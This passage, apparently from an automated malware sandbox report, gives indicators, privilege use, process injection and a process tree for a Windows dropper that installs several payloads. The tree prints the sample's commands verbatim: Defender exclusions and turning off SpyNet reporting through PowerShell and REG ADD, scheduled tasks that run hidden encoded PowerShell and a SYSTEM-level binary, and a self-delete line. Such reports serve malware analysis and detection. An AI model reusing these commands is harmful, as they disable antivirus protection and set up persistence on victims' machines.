fa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e 6Hu1t4TRKcdzy4v1abT8sdrW.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 6Hu1t4TRKcdzy4v1abT8sdrW.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1152 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4916 powershell.exe 4916 powershell.exe 2972 u1sg.0.exe 2972 u1sg.0.exe 3316 powershell.EXE 3316 powershell.EXE 1888 powershell.EXE 1888 powershell.EXE 3316 powershell.EXE 1888 powershell.EXE 2972 u1sg.0.exe 2972 u1sg.0.exe 3816 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 3816 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 3816 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 3816 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 3816 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 3816 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 3816 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 3816 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 3816 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 3816 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 3816 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 3816 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 3816 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 3816 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 3816 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 3816 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 3816 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 3816 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 3816 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 3816 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 3816 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 3816 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 3816 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 3816 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 2476 powershell.exe 2476 powershell.exe 2476 powershell.exe 1508 powershell.exe 1508 powershell.exe 1508 powershell.exe 2596 msiexec.exe 2596 msiexec.exe 2120 powershell.EXE 2120 powershell.EXE 2120 powershell.EXE 1020 yYUkcpR.exe 1020 yYUkcpR.exe 1020 yYUkcpR.exe 1020 yYUkcpR.exe 1020 yYUkcpR.exe 1020 yYUkcpR.exe 1020 yYUkcpR.exe 1020 yYUkcpR.exe 1020 yYUkcpR.exe 1020 yYUkcpR.exe 1020 yYUkcpR.exe 1020 yYUkcpR.exe 1020 yYUkcpR.exe 1020 yYUkcpR.exe 1020 yYUkcpR.exe 1020 yYUkcpR.exe 1020 yYUkcpR.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 668 Process not Found -
Suspicious use of AdjustPrivilegeToken 53 IoCs
description pid Process Token: SeDebugPrivilege 4040 ad3276e302e34fed06a6afb6db77e6e7dd250df29a5d1695403991b174276f35.exe Token: SeDebugPrivilege 4916 powershell.exe Token: SeDebugPrivilege 1144 regsvcs.exe Token: SeDebugPrivilege 3316 powershell.EXE Token: SeDebugPrivilege 1888 powershell.EXE Token: SeDebugPrivilege 3816 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Token: SeDebugPrivilege 2476 powershell.exe Token: SeShutdownPrivilege 1312 msiexec.exe Token: SeIncreaseQuotaPrivilege 1312 msiexec.exe Token: SeSecurityPrivilege 2596 msiexec.exe Token: SeCreateTokenPrivilege 1312 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1312 msiexec.exe Token: SeLockMemoryPrivilege 1312 msiexec.exe Token: SeIncreaseQuotaPrivilege 1312 msiexec.exe Token: SeMachineAccountPrivilege 1312 msiexec.exe Token: SeTcbPrivilege 1312 msiexec.exe Token: SeSecurityPrivilege 1312 msiexec.exe Token: SeTakeOwnershipPrivilege 1312 msiexec.exe Token: SeLoadDriverPrivilege 1312 msiexec.exe Token: SeSystemProfilePrivilege 1312 msiexec.exe Token: SeSystemtimePrivilege 1312 msiexec.exe Token: SeProfSingleProcessPrivilege 1312 msiexec.exe Token: SeIncBasePriorityPrivilege 1312 msiexec.exe Token: SeCreatePagefilePrivilege 1312 msiexec.exe Token: SeCreatePermanentPrivilege 1312 msiexec.exe Token: SeBackupPrivilege 1312 msiexec.exe Token: SeRestorePrivilege 1312 msiexec.exe Token: SeShutdownPrivilege 1312 msiexec.exe Token: SeDebugPrivilege 1312 msiexec.exe Token: SeAuditPrivilege 1312 msiexec.exe Token: SeSystemEnvironmentPrivilege 1312 msiexec.exe Token: SeChangeNotifyPrivilege 1312 msiexec.exe Token: SeRemoteShutdownPrivilege 1312 msiexec.exe Token: SeUndockPrivilege 1312 msiexec.exe Token: SeSyncAgentPrivilege 1312 msiexec.exe Token: SeEnableDelegationPrivilege 1312 msiexec.exe Token: SeManageVolumePrivilege 1312 msiexec.exe Token: SeImpersonatePrivilege 1312 msiexec.exe Token: SeCreateGlobalPrivilege 1312 msiexec.exe Token: SeRestorePrivilege 2596 msiexec.exe Token: SeTakeOwnershipPrivilege 2596 msiexec.exe Token: SeDebugPrivilege 1508 powershell.exe Token: SeDebugPrivilege 2120 powershell.EXE Token: SeRestorePrivilege 2596 msiexec.exe Token: SeTakeOwnershipPrivilege 2596 msiexec.exe Token: SeRestorePrivilege 2596 msiexec.exe Token: SeTakeOwnershipPrivilege 2596 msiexec.exe Token: SeRestorePrivilege 2596 msiexec.exe Token: SeTakeOwnershipPrivilege 2596 msiexec.exe Token: SeRestorePrivilege 2596 msiexec.exe Token: SeTakeOwnershipPrivilege 2596 msiexec.exe Token: SeRestorePrivilege 2596 msiexec.exe Token: SeTakeOwnershipPrivilege 2596 msiexec.exe -
Suspicious use of FindShellTrayWindow 7 IoCs
pid Process 1440 u1sg.1.exe 1440 u1sg.1.exe 1440 u1sg.1.exe 1440 u1sg.1.exe 1440 u1sg.1.exe 1440 u1sg.1.exe 1440 u1sg.1.exe -
Suspicious use of SendNotifyMessage 7 IoCs
pid Process 1440 u1sg.1.exe 1440 u1sg.1.exe 1440 u1sg.1.exe 1440 u1sg.1.exe 1440 u1sg.1.exe 1440 u1sg.1.exe 1440 u1sg.1.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4040 wrote to memory of 4916 4040 ad3276e302e34fed06a6afb6db77e6e7dd250df29a5d1695403991b174276f35.exe 81 PID 4040 wrote to memory of 4916 4040 ad3276e302e34fed06a6afb6db77e6e7dd250df29a5d1695403991b174276f35.exe 81 PID 4040 wrote to memory of 1144 4040 ad3276e302e34fed06a6afb6db77e6e7dd250df29a5d1695403991b174276f35.exe 83 PID 4040 wrote to memory of 1144 4040 ad3276e302e34fed06a6afb6db77e6e7dd250df29a5d1695403991b174276f35.exe 83 PID 4040 wrote to memory of 1144 4040 ad3276e302e34fed06a6afb6db77e6e7dd250df29a5d1695403991b174276f35.exe 83 PID 4040 wrote to memory of 1144 4040 ad3276e302e34fed06a6afb6db77e6e7dd250df29a5d1695403991b174276f35.exe 83 PID 4040 wrote to memory of 1144 4040 ad3276e302e34fed06a6afb6db77e6e7dd250df29a5d1695403991b174276f35.exe 83 PID 4040 wrote to memory of 1144 4040 ad3276e302e34fed06a6afb6db77e6e7dd250df29a5d1695403991b174276f35.exe 83 PID 4040 wrote to memory of 1144 4040 ad3276e302e34fed06a6afb6db77e6e7dd250df29a5d1695403991b174276f35.exe 83 PID 4040 wrote to memory of 1144 4040 ad3276e302e34fed06a6afb6db77e6e7dd250df29a5d1695403991b174276f35.exe 83 PID 1144 wrote to memory of 2320 1144 regsvcs.exe 84 PID 1144 wrote to memory of 2320 1144 regsvcs.exe 84 PID 1144 wrote to memory of 2320 1144 regsvcs.exe 84 PID 1144 wrote to memory of 1892 1144 regsvcs.exe 85 PID 1144 wrote to memory of 1892 1144 regsvcs.exe 85 PID 1144 wrote to memory of 1892 1144 regsvcs.exe 85 PID 1892 wrote to memory of 3468 1892 6Hu1t4TRKcdzy4v1abT8sdrW.exe 86 PID 1892 wrote to memory of 3468 1892 6Hu1t4TRKcdzy4v1abT8sdrW.exe 86 PID 1892 wrote to memory of 3468 1892 6Hu1t4TRKcdzy4v1abT8sdrW.exe 86 PID 1892 wrote to memory of 4744 1892 6Hu1t4TRKcdzy4v1abT8sdrW.exe 87 PID 1892 wrote to memory of 4744 1892 6Hu1t4TRKcdzy4v1abT8sdrW.exe 87 PID 1892 wrote to memory of 4744 1892 6Hu1t4TRKcdzy4v1abT8sdrW.exe 87 PID 2320 wrote to memory of 2972 2320 xHSuJrJS9vwhsvRTR3eTrJtk.exe 88 PID 2320 wrote to memory of 2972 2320 xHSuJrJS9vwhsvRTR3eTrJtk.exe 88 PID 2320 wrote to memory of 2972 2320 xHSuJrJS9vwhsvRTR3eTrJtk.exe 88 PID 1892 wrote to memory of 4536 1892 6Hu1t4TRKcdzy4v1abT8sdrW.exe 91 PID 1892 wrote to memory of 4536 1892 6Hu1t4TRKcdzy4v1abT8sdrW.exe 91 PID 1892 wrote to memory of 4536 1892 6Hu1t4TRKcdzy4v1abT8sdrW.exe 91 PID 4536 wrote to memory of 2292 4536 6Hu1t4TRKcdzy4v1abT8sdrW.exe 92 PID 4536 wrote to memory of 2292 4536 6Hu1t4TRKcdzy4v1abT8sdrW.exe 92 PID 4536 wrote to memory of 2292 4536 6Hu1t4TRKcdzy4v1abT8sdrW.exe 92 PID 1144 wrote to memory of 4524 1144 regsvcs.exe 93 PID 1144 wrote to memory of 4524 1144 regsvcs.exe 93 PID 1144 wrote to memory of 4524 1144 regsvcs.exe 93 PID 1144 wrote to memory of 3148 1144 regsvcs.exe 94 PID 1144 wrote to memory of 3148 1144 regsvcs.exe 94 PID 1144 wrote to memory of 3148 1144 regsvcs.exe 94 PID 2320 wrote to memory of 1440 2320 xHSuJrJS9vwhsvRTR3eTrJtk.exe 95 PID 2320 wrote to memory of 1440 2320 xHSuJrJS9vwhsvRTR3eTrJtk.exe 95 PID 2320 wrote to memory of 1440 2320 xHSuJrJS9vwhsvRTR3eTrJtk.exe 95 PID 4524 wrote to memory of 2584 4524 fzjvJcnlDLmOSokrFJQkEgGJ.exe 98 PID 4524 wrote to memory of 2584 4524 fzjvJcnlDLmOSokrFJQkEgGJ.exe 98 PID 4524 wrote to memory of 2584 4524 fzjvJcnlDLmOSokrFJQkEgGJ.exe 98 PID 3148 wrote to memory of 1964 3148 zTyJM5hOpuGaK7i31uroEAKP.exe 100 PID 3148 wrote to memory of 1964 3148 zTyJM5hOpuGaK7i31uroEAKP.exe 100 PID 3148 wrote to memory of 1964 3148 zTyJM5hOpuGaK7i31uroEAKP.exe 100 PID 1964 wrote to memory of 1956 1964 Install.exe 103 PID 1964 wrote to memory of 1956 1964 Install.exe 103 PID 1964 wrote to memory of 1956 1964 Install.exe 103 PID 2584 wrote to memory of 4548 2584 Install.exe 104 PID 2584 wrote to memory of 4548 2584 Install.exe 104 PID 2584 wrote to memory of 4548 2584 Install.exe 104 PID 1964 wrote to memory of 2332 1964 Install.exe 108 PID 1964 wrote to memory of 2332 1964 Install.exe 108 PID 1964 wrote to memory of 2332 1964 Install.exe 108 PID 1144 wrote to memory of 2868 1144 regsvcs.exe 107 PID 1144 wrote to memory of 2868 1144 regsvcs.exe 107 PID 2584 wrote to memory of 2664 2584 Install.exe 109 PID 2584 wrote to memory of 2664 2584 Install.exe 109 PID 2584 wrote to memory of 2664 2584 Install.exe 109 PID 1956 wrote to memory of 4608 1956 forfiles.exe 112 PID 1956 wrote to memory of 4608 1956 forfiles.exe 112 PID 1956 wrote to memory of 4608 1956 forfiles.exe 112 PID 4548 wrote to memory of 1416 4548 forfiles.exe 113
Processes
-
C:\Users\Admin\AppData\Local\Temp\ad3276e302e34fed06a6afb6db77e6e7dd250df29a5d1695403991b174276f35.exe"C:\Users\Admin\AppData\Local\Temp\ad3276e302e34fed06a6afb6db77e6e7dd250df29a5d1695403991b174276f35.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4040 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4916
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"2⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1144 -
C:\Users\Admin\Pictures\xHSuJrJS9vwhsvRTR3eTrJtk.exe"C:\Users\Admin\Pictures\xHSuJrJS9vwhsvRTR3eTrJtk.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2320 -
C:\Users\Admin\AppData\Local\Temp\u1sg.0.exe"C:\Users\Admin\AppData\Local\Temp\u1sg.0.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:2972 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\BAECFHJEBA.exe"5⤵PID:3216
-
C:\Users\Admin\AppData\Local\Temp\BAECFHJEBA.exe"C:\Users\Admin\AppData\Local\Temp\BAECFHJEBA.exe"6⤵
- Executes dropped EXE
PID:948 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\BAECFHJEBA.exe7⤵PID:788
-
C:\Windows\SysWOW64\PING.EXEping 2.2.2.2 -n 1 -w 30008⤵
- Runs ping.exe
PID:1152
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2972 -s 33965⤵
- Program crash
PID:4760
-
-
-
C:\Users\Admin\AppData\Local\Temp\u1sg.1.exe"C:\Users\Admin\AppData\Local\Temp\u1sg.1.exe"4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1440 -
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD15⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3816
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2320 -s 11564⤵
- Program crash
PID:3256
-
-
-
C:\Users\Admin\Pictures\6Hu1t4TRKcdzy4v1abT8sdrW.exe"C:\Users\Admin\Pictures\6Hu1t4TRKcdzy4v1abT8sdrW.exe" --silent --allusers=03⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1892 -
C:\Users\Admin\Pictures\6Hu1t4TRKcdzy4v1abT8sdrW.exeC:\Users\Admin\Pictures\6Hu1t4TRKcdzy4v1abT8sdrW.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.38 --initial-client-data=0x2c0,0x2c4,0x2c8,0x294,0x2cc,0x6f89e1d0,0x6f89e1dc,0x6f89e1e84⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3468
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\6Hu1t4TRKcdzy4v1abT8sdrW.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\6Hu1t4TRKcdzy4v1abT8sdrW.exe" --version4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4744
-
-
C:\Users\Admin\Pictures\6Hu1t4TRKcdzy4v1abT8sdrW.exe"C:\Users\Admin\Pictures\6Hu1t4TRKcdzy4v1abT8sdrW.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=1892 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240403112332" --session-guid=050039fe-c4da-415c-bdd0-e35ef15b61fe --server-tracking-blob=ZDg0NWUxMjMwNTdkM2QxNmRiNTBiYTg0MjI0MTI1M2Q0ZjViZDUzZGI5NjA4ZGZkZWY0NTcxNzQxNTk1ZjViZTp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N180NTYiLCJzeXN0ZW0iOnsicGxhdGZvcm0iOnsiYXJjaCI6Ing4Nl82NCIsIm9wc3lzIjoiV2luZG93cyIsIm9wc3lzLXZlcnNpb24iOiIxMSIsInBhY2thZ2UiOiJFWEUifX0sInRpbWVzdGFtcCI6IjE3MTIxNDM0MTAuMjg1NyIsInV0bSI6eyJjYW1wYWlnbiI6Ijc2N180NTYiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJta3QifSwidXVpZCI6IjM0ODc4Y2ZkLTZmMGYtNGUzYS1iZDNkLTJiMDQzMWQ5NGZmNSJ9 --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=FC050000000000004⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
PID:4536 -
C:\Users\Admin\Pictures\6Hu1t4TRKcdzy4v1abT8sdrW.exeC:\Users\Admin\Pictures\6Hu1t4TRKcdzy4v1abT8sdrW.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.38 --initial-client-data=0x2b0,0x2b4,0x2b8,0x28c,0x2bc,0x6e6ae1d0,0x6e6ae1dc,0x6e6ae1e85⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2292
-
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404031123321\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404031123321\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"4⤵
- Executes dropped EXE
PID:4016
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404031123321\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404031123321\assistant\assistant_installer.exe" --version4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:840 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404031123321\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404031123321\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x284,0x288,0x28c,0x260,0x290,0x750040,0x75004c,0x7500585⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4616
-
-
-
-
C:\Users\Admin\Pictures\fzjvJcnlDLmOSokrFJQkEgGJ.exe"C:\Users\Admin\Pictures\fzjvJcnlDLmOSokrFJQkEgGJ.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4524 -
C:\Users\Admin\AppData\Local\Temp\7zSE1B5.tmp\Install.exe.\Install.exe /dEKGWdidYWnQ "385118" /S4⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2584 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"5⤵
- Suspicious use of WriteProcessMemory
PID:4548 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&6⤵PID:1416
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:327⤵PID:3640
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:647⤵PID:4916
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"5⤵PID:2664
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&6⤵PID:4040
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:327⤵PID:4180
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:647⤵PID:1768
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gKJHPVqYj" /SC once /ST 08:54:12 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="5⤵
- Creates scheduled task(s)
PID:2108
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gKJHPVqYj"5⤵PID:1152
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gKJHPVqYj"5⤵PID:1640
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bCAdHbOFiqtMCRhbmR" /SC once /ST 11:25:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\vBjgpUK.exe\" hl /yUsite_idMiU 385118 /S" /V1 /F5⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3392
-
-
-
-
C:\Users\Admin\Pictures\zTyJM5hOpuGaK7i31uroEAKP.exe"C:\Users\Admin\Pictures\zTyJM5hOpuGaK7i31uroEAKP.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3148 -
C:\Users\Admin\AppData\Local\Temp\7zSE3A9.tmp\Install.exe.\Install.exe /dEKGWdidYWnQ "385118" /S4⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1964 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"5⤵
- Suspicious use of WriteProcessMemory
PID:1956 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&6⤵PID:4608
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:327⤵PID:4952
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:647⤵PID:1544
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"5⤵PID:2332
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&6⤵PID:4044
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:327⤵PID:820
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:647⤵PID:4556
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gKJHPVqYj" /SC once /ST 08:54:12 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="5⤵
- Creates scheduled task(s)
PID:2592
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gKJHPVqYj"5⤵PID:4796
-
-
